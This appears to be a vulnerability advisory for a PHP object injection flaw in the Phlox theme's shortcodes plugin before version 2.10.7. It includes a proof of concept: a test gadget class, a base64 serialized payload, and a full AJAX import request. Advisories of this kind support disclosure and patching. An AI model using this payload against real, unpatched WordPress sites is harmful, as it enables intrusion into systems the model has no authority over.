WordPress Plugin Vulnerabilities
Shortcodes and extra features for Phlox theme < 2.10.7 - PHP Objection Injection
Description
The plugin unserializes the content of an imported file, which could lead to PHP object injection when a user imports (intentionally or not) a malicious file and a suitable gadget chain is present on the blog.
Proof of Concept
To simulate a gadget chain, put the following code in a plugin
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
Create a file named import.txt with the following content and import it (Appearance > Customize > Extras, and then "Import/Export"): Tzo0OiJFdmlsIjowOnt9Ow== (which is base64 encode of O:4:"Evil":0:{};)
The Arbitrary deserialization will be displayed in response to the AJAX request.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------311648694729615030513398536822
Content-Length: 519
Cookie: [Cookie]
-----------------------------311648694729615030513398536822
Content-Disposition: form-data; name="file"; filename="import.txt"
Content-Type: text/plain
Tzo0OiJFdmlsIjowOnt9Ow==
-----------------------------311648694729615030513398536822
Content-Disposition: form-data; name="action"
auxin_customizer_import
-----------------------------311648694729615030513398536822
Content-Disposition: form-data; name="nonce"
3da8669d7a
-----------------------------311648694729615030513398536822--
Affects Plugins
Fixed in version 2.10.7
References
Classification
Miscellaneous
Original Researcher
Nguyen Duy Quoc Khanh
Submitter
Nguyen Duy Quoc Khanh
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2022-11-17 (about 2 months ago)
Added
2022-11-17 (about 2 months ago)
Last Updated
2023-01-23 (about 9 days ago)